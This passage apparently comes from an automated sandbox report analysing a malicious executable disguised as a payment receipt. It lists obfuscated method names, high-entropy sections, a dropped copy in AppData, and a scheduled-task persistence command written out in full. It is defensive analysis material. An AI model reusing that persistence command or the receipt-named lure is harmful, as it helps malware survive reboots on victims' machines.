                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_010E09AD push ecx; mov dword ptr [esp], ecx 9_2_010E09B6
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Code function: 10_2_073095A0 push esp; retf 10_2_073095A9
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Code function: 10_2_0730D088 pushad ; iretd 10_2_0730D095
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Code function: 10_2_0730E0FD push FFFFFF8Bh; iretd 10_2_0730E0FF
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Code function: 10_2_0730DD61 push ss; ret 10_2_0730DD62
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Code function: 10_2_07309A32 pushfd ; iretd 10_2_07309A39
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_0113C54F push 8B010C67h; ret 15_2_0113C554
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_0113C54D pushfd ; ret 15_2_0113C54E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_010F09AD push ecx; mov dword ptr [esp], ecx 15_2_010F09B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_0113C9D7 push edi; ret 15_2_0113C9D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_010C1FEC push eax; iretd 15_2_010C1FED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 15_2_01147E99 push ecx; ret 15_2_01147EAC
                Source: PAYMENT RECEIPT_USD21,000.exe | Static PE information: section name: .text entropy: 7.582634051585841
                Source: fttQgpyzkkc.exe.0.dr | Static PE information: section name: .text entropy: 7.582634051585841
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, GikDqR6g4UGrEltCUX.cs | High entropy of concatenated method names: 'lnZkYPMdSG', 'tjQkf6wG3D', 'k7Wkhhr2hH', 'DcukloQpAu', 'iDRkKScF8v', 'ujrku8HLW0', 'NFvkRYvl4R', 'l1bkvvfQaf', 'UCtkoyNh1I', 'WNNkgb0wRr'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, AneXfQPNEE8YvYRqYq.cs | High entropy of concatenated method names: 'b94IGndDuT', 'DJxIku1YXB', 'o06ITJ4ONC', 'bqZIQhpeqa', 'lpNIx65S4H', 'TuPTKeNToN', 'BUcTuO32Nd', 'JXeTRSuPqE', 'rR6Tv3n39q', 'l2pTo1Ah7B'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, u83HyvHgi0F6Oi2kUP.cs | High entropy of concatenated method names: 'CvemjTuk54QjiXRtkdQ', 'NE1olkudyA1gGFmmuYy', 'ix6xnaupf7JdG4HMStI', 'SnIItfQVnY', 'ss7Ircb6VW', 'sAiIeZl27P', 'k5TKx6utBiXfOSvIwWA', 'hUkoyxuMiD5ITlFV5KW'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, mOWlKxqiTOOTTUCo6Y.cs | High entropy of concatenated method names: 'lEJQEnduR4', 'RjbQUjOD2A', 'wLlQO787J0', 'E2ZQb0LmKH', 'DB1QLaCHGn', 'mYDQNooi6C', 'THFQ9PDrS5', 'WusQ6PSmNa', 'M2gQ3QwlTi', 'JIDQ0DrK5m'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, jIJVAXz9H2a6Ch1c4g.cs | High entropy of concatenated method names: 'klveN9gu7q', 'CPAe6ExUwq', 'vBUe3KFPcB', 'JXfePD9TMY', 'hsLeHNc50t', 'Utxe5OFoBc', 'adVe1BSJ5q', 'P2xeSp1yOl', 'pGieEIgBjT', 'anweUscTNb'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, ahWIV1RS9pavR23yV8.cs | High entropy of concatenated method names: 'BJYrsSIxTE', 'Q9qrmAwgls', 'AbHrr74g7y', 'RwErXRlOJK', 'oZPrynNkFR', 'd9ZrSBniEC', 'Dispose', 'VG4tCZxS4H', 'tGUtkYh0XR', 'PSbtDB8cPH'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, O38XpNYSEdntuKrXg4.cs | High entropy of concatenated method names: 'TWlsWgxnTQ', 'Eg9sahEq5O', 'QnDsYgbfcA', 'TdjsfS5j5I', 'ygusHxym7u', 'fKjs7ecVjK', 'HqZs5NnhWP', 'gXXs1xlKM6', 'FrNsVYwqG2', 'Xm8scTuDWV'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, Y7vEqcjLD9rUht9AA2.cs | High entropy of concatenated method names: 'z7yJ6s2n5k', 'wr0J37E6OE', 'EymJPaoIoW', 'qQtJHqpiXY', 'BVTJ5Umg6w', 'v5cJ1iOto3', 'tmiJcdsRYT', 'PhSJAZCdpc', 'rI9JWNps2u', 'jGaJFttHYX'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, Vll9ulcHUBKWIKcZSl.cs | High entropy of concatenated method names: 'Q1RQCYbByx', 'UQeQD9OUFF', 'EjMQIfO5Ty', 'uOtIgwsRfY', 'M8HIzNouNP', 'u1ZQipa2sk', 'vxNQd26Rnx', 'iWvQwYUrID', 'F6RQ2fh0sB', 'yDfQ4kSnEe'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, LYPZ4R3pGAHH4YQwgA.csHigh entropy of concatenated method names: 'bByDbfvT9t', 'tl5DN7awsj', 'gFrD6QWtBQ', 'Md8D3HX4kb', 'uGQDsK0Qar', 'KC5D86TXr6', 'XmoDmKWgRL', 'z1HDtmBPbF', 'PBlDr3ybkA', 'KKoDef1ni9'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, MoGqTF0De7oYCQoCBs.csHigh entropy of concatenated method names: 'HXlTLUeYuW', 'Gd9T9y7DSN', 'B1mD7VL70D', 'w4ZD5dLLgc', 'K8tD1OjiRS', 'X5lDVZo7Bf', 'wJbDcFShZ6', 'DhnDAos8HP', 'AdADqDSXuJ', 'm2qDW6LNU2'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, H18ZtFd4b4wjKjHmVS3.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cMGBrLOuL4', 'u8yBeEQr75', 'IkpBXccYOc', 'JtJBBgtJt3', 'Jn4By4lCrx', 'tSiBnRmRjI', 'QeiBS073MS'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, oSjAY1lhF1GC5SIquF.csHigh entropy of concatenated method names: 'FGhmMQW6vy', 'HxgmZrrNc1', 'ToString', 'WgsmCIAJ2p', 'mKUmkv1upk', 'VwUmD9byx6', 'QMLmTEpYUy', 'FAcmIXkDV0', 'AsKmQFoBW1', 'ffSmxNqgtF'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, VK9UFuhDVeFXxXgkpl.csHigh entropy of concatenated method names: 'ToString', 'ncE8FmVDVW', 'fKi8HI5KZ7', 'UMM873U9Jm', 'wpY85EcSqV', 'LXj81t3brv', 'A3o8VFxTjZ', 'xqJ8cvPMeM', 'gbc8AAR6xR', 'UyN8qJGGGr'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, L731PFwBlaHCpoRhA0.csHigh entropy of concatenated method names: 'vryO39aA0', 'gEFbaNsQh', 'BncN6ASv0', 'TbO9fkr8Y', 'IW53q2cqE', 'pH40xAy9e', 'wTV1HWZDAYxs0R6iOg', 'PvpefnIcsUo38JBceu', 'j78aRpgBbYoJOr1ni6', 'p8kt2SWnW'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, zqu2o5udpaX1dAojgq.csHigh entropy of concatenated method names: 'ksXmvvB2YJ', 'Atgmg7Xuws', 'J96tipDQIJ', 'tlxtdsKbSG', 'oQvmFY78G3', 'xnZmassIkh', 'lkVmjmeuc9', 'oJAmYNhgGQ', 'p2Smf61c6p', 'O8amhToXlA'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, uQNTqjddnblywa3ZD0i.csHigh entropy of concatenated method names: 'N8PegaK8l3', 'JCJezY1m1g', 'ADiXiCEpSt', 'I19XdZ2Z3r', 'kAPXwhPwTb', 'glPX2lkLIQ', 'xCBX4tAPLE', 's93XGJtVoy', 'D47XC8ShGI', 'FetXkMfJvC'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, l7Cdp1x36yCles9PKB.csHigh entropy of concatenated method names: 'Ttk2GApPwd', 'Led2CmXgkR', 'KEt2kGjoKh', 'MbX2DfHKtM', 'RbU2TlXVyG', 'dct2ILk6Vx', 'ysq2QyBMpt', 'gDQ2xbDLcZ', 'xRV2pBGITp', 'Kib2MeBrKP'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, RMVsIED7C1wyR52SMG.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'XI7woQ9R3y', 'G1gwgahHW4', 'C0Bwz5YxpX', 'bYl2i54Pnj', 'wP52djSn0v', 'JAI2wA9lJK', 'qpY22ZH47r', 'KOHg6Fjm2SPhbL1CcB3'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, H1W8MGk0b3dbYKruaD.csHigh entropy of concatenated method names: 'Dispose', 'lavdoR23yV', 'IhKwHqohwU', 'eMT7Mekk8a', 'pULdgGaeIw', 'Ir4dzOlYX6', 'ProcessDialogKey', 'abPwiuWZlZ', 'KyTwdGaP4D', 'f91ww2ctcD'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, EB6CrldivkvLqGOS5Ic.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'R3leF7JJfp', 'siFeabRRuo', 'LgoejyyG9t', 'o0YeYigSyQ', 'jbHefydsvF', 'Hm2ehNT28m', 'RHPel3kWiU'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, xKCmdn4pHsdy1wvAJp.csHigh entropy of concatenated method names: 'xyHdQikDqR', 'Y4UdxGrElt', 'WpGdMAHH4Y', 'jwgdZAqoGq', 'joCdsBsbne', 'tfQd8NEE8Y', 'EPQ7Zxv7pgMhIWeTxs', 'NCM7BQHUFPPChoOXy0', 'MonddSaSnN', 'Ahtd2xqQrx'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, GuWZlZoVyTGaP4DC91.csHigh entropy of concatenated method names: 'yr0rPZ7war', 'qCDrHV0nG2', 'A1Er7Isk5c', 'zRfr5f8R3H', 'pWQr15UB8Y', 'kuIrVHtBrB', 'AZArcnIrnv', 'gsYrAWug18', 'CGDrqDrj3N', 'w7irWqIvS2'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, GikDqR6g4UGrEltCUX.csHigh entropy of concatenated method names: 'lnZkYPMdSG', 'tjQkf6wG3D', 'k7Wkhhr2hH', 'DcukloQpAu', 'iDRkKScF8v', 'ujrku8HLW0', 'NFvkRYvl4R', 'l1bkvvfQaf', 'UCtkoyNh1I', 'WNNkgb0wRr'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, AneXfQPNEE8YvYRqYq.csHigh entropy of concatenated method names: 'b94IGndDuT', 'DJxIku1YXB', 'o06ITJ4ONC', 'bqZIQhpeqa', 'lpNIx65S4H', 'TuPTKeNToN', 'BUcTuO32Nd', 'JXeTRSuPqE', 'rR6Tv3n39q', 'l2pTo1Ah7B'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, u83HyvHgi0F6Oi2kUP.csHigh entropy of concatenated method names: 'CvemjTuk54QjiXRtkdQ', 'NE1olkudyA1gGFmmuYy', 'ix6xnaupf7JdG4HMStI', 'SnIItfQVnY', 'ss7Ircb6VW', 'sAiIeZl27P', 'k5TKx6utBiXfOSvIwWA', 'hUkoyxuMiD5ITlFV5KW'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, mOWlKxqiTOOTTUCo6Y.csHigh entropy of concatenated method names: 'lEJQEnduR4', 'RjbQUjOD2A', 'wLlQO787J0', 'E2ZQb0LmKH', 'DB1QLaCHGn', 'mYDQNooi6C', 'THFQ9PDrS5', 'WusQ6PSmNa', 'M2gQ3QwlTi', 'JIDQ0DrK5m'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, jIJVAXz9H2a6Ch1c4g.csHigh entropy of concatenated method names: 'klveN9gu7q', 'CPAe6ExUwq', 'vBUe3KFPcB', 'JXfePD9TMY', 'hsLeHNc50t', 'Utxe5OFoBc', 'adVe1BSJ5q', 'P2xeSp1yOl', 'pGieEIgBjT', 'anweUscTNb'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, ahWIV1RS9pavR23yV8.csHigh entropy of concatenated method names: 'BJYrsSIxTE', 'Q9qrmAwgls', 'AbHrr74g7y', 'RwErXRlOJK', 'oZPrynNkFR', 'd9ZrSBniEC', 'Dispose', 'VG4tCZxS4H', 'tGUtkYh0XR', 'PSbtDB8cPH'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, O38XpNYSEdntuKrXg4.csHigh entropy of concatenated method names: 'TWlsWgxnTQ', 'Eg9sahEq5O', 'QnDsYgbfcA', 'TdjsfS5j5I', 'ygusHxym7u', 'fKjs7ecVjK', 'HqZs5NnhWP', 'gXXs1xlKM6', 'FrNsVYwqG2', 'Xm8scTuDWV'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, Y7vEqcjLD9rUht9AA2.csHigh entropy of concatenated method names: 'z7yJ6s2n5k', 'wr0J37E6OE', 'EymJPaoIoW', 'qQtJHqpiXY', 'BVTJ5Umg6w', 'v5cJ1iOto3', 'tmiJcdsRYT', 'PhSJAZCdpc', 'rI9JWNps2u', 'jGaJFttHYX'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, Vll9ulcHUBKWIKcZSl.csHigh entropy of concatenated method names: 'Q1RQCYbByx', 'UQeQD9OUFF', 'EjMQIfO5Ty', 'uOtIgwsRfY', 'M8HIzNouNP', 'u1ZQipa2sk', 'vxNQd26Rnx', 'iWvQwYUrID', 'F6RQ2fh0sB', 'yDfQ4kSnEe'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, LYPZ4R3pGAHH4YQwgA.csHigh entropy of concatenated method names: 'bByDbfvT9t', 'tl5DN7awsj', 'gFrD6QWtBQ', 'Md8D3HX4kb', 'uGQDsK0Qar', 'KC5D86TXr6', 'XmoDmKWgRL', 'z1HDtmBPbF', 'PBlDr3ybkA', 'KKoDef1ni9'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, MoGqTF0De7oYCQoCBs.csHigh entropy of concatenated method names: 'HXlTLUeYuW', 'Gd9T9y7DSN', 'B1mD7VL70D', 'w4ZD5dLLgc', 'K8tD1OjiRS', 'X5lDVZo7Bf', 'wJbDcFShZ6', 'DhnDAos8HP', 'AdADqDSXuJ', 'm2qDW6LNU2'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, H18ZtFd4b4wjKjHmVS3.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cMGBrLOuL4', 'u8yBeEQr75', 'IkpBXccYOc', 'JtJBBgtJt3', 'Jn4By4lCrx', 'tSiBnRmRjI', 'QeiBS073MS'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, oSjAY1lhF1GC5SIquF.csHigh entropy of concatenated method names: 'FGhmMQW6vy', 'HxgmZrrNc1', 'ToString', 'WgsmCIAJ2p', 'mKUmkv1upk', 'VwUmD9byx6', 'QMLmTEpYUy', 'FAcmIXkDV0', 'AsKmQFoBW1', 'ffSmxNqgtF'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, VK9UFuhDVeFXxXgkpl.csHigh entropy of concatenated method names: 'ToString', 'ncE8FmVDVW', 'fKi8HI5KZ7', 'UMM873U9Jm', 'wpY85EcSqV', 'LXj81t3brv', 'A3o8VFxTjZ', 'xqJ8cvPMeM', 'gbc8AAR6xR', 'UyN8qJGGGr'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, L731PFwBlaHCpoRhA0.csHigh entropy of concatenated method names: 'vryO39aA0', 'gEFbaNsQh', 'BncN6ASv0', 'TbO9fkr8Y', 'IW53q2cqE', 'pH40xAy9e', 'wTV1HWZDAYxs0R6iOg', 'PvpefnIcsUo38JBceu', 'j78aRpgBbYoJOr1ni6', 'p8kt2SWnW'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, zqu2o5udpaX1dAojgq.csHigh entropy of concatenated method names: 'ksXmvvB2YJ', 'Atgmg7Xuws', 'J96tipDQIJ', 'tlxtdsKbSG', 'oQvmFY78G3', 'xnZmassIkh', 'lkVmjmeuc9', 'oJAmYNhgGQ', 'p2Smf61c6p', 'O8amhToXlA'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, uQNTqjddnblywa3ZD0i.csHigh entropy of concatenated method names: 'N8PegaK8l3', 'JCJezY1m1g', 'ADiXiCEpSt', 'I19XdZ2Z3r', 'kAPXwhPwTb', 'glPX2lkLIQ', 'xCBX4tAPLE', 's93XGJtVoy', 'D47XC8ShGI', 'FetXkMfJvC'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, l7Cdp1x36yCles9PKB.csHigh entropy of concatenated method names: 'Ttk2GApPwd', 'Led2CmXgkR', 'KEt2kGjoKh', 'MbX2DfHKtM', 'RbU2TlXVyG', 'dct2ILk6Vx', 'ysq2QyBMpt', 'gDQ2xbDLcZ', 'xRV2pBGITp', 'Kib2MeBrKP'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, RMVsIED7C1wyR52SMG.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'XI7woQ9R3y', 'G1gwgahHW4', 'C0Bwz5YxpX', 'bYl2i54Pnj', 'wP52djSn0v', 'JAI2wA9lJK', 'qpY22ZH47r', 'KOHg6Fjm2SPhbL1CcB3'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, H1W8MGk0b3dbYKruaD.csHigh entropy of concatenated method names: 'Dispose', 'lavdoR23yV', 'IhKwHqohwU', 'eMT7Mekk8a', 'pULdgGaeIw', 'Ir4dzOlYX6', 'ProcessDialogKey', 'abPwiuWZlZ', 'KyTwdGaP4D', 'f91ww2ctcD'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, EB6CrldivkvLqGOS5Ic.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'R3leF7JJfp', 'siFeabRRuo', 'LgoejyyG9t', 'o0YeYigSyQ', 'jbHefydsvF', 'Hm2ehNT28m', 'RHPel3kWiU'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, xKCmdn4pHsdy1wvAJp.csHigh entropy of concatenated method names: 'xyHdQikDqR', 'Y4UdxGrElt', 'WpGdMAHH4Y', 'jwgdZAqoGq', 'joCdsBsbne', 'tfQd8NEE8Y', 'EPQ7Zxv7pgMhIWeTxs', 'NCM7BQHUFPPChoOXy0', 'MonddSaSnN', 'Ahtd2xqQrx'
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, GuWZlZoVyTGaP4DC91.csHigh entropy of concatenated method names: 'yr0rPZ7war', 'qCDrHV0nG2', 'A1Er7Isk5c', 'zRfr5f8R3H', 'pWQr15UB8Y', 'kuIrVHtBrB', 'AZArcnIrnv', 'gsYrAWug18', 'CGDrqDrj3N', 'w7irWqIvS2'
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exeFile created: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeJump to dropped file

                Boot Survival

                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" /XML "C:\Users\user\AppData\Local\Temp\tmp3A9E.tmp"

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
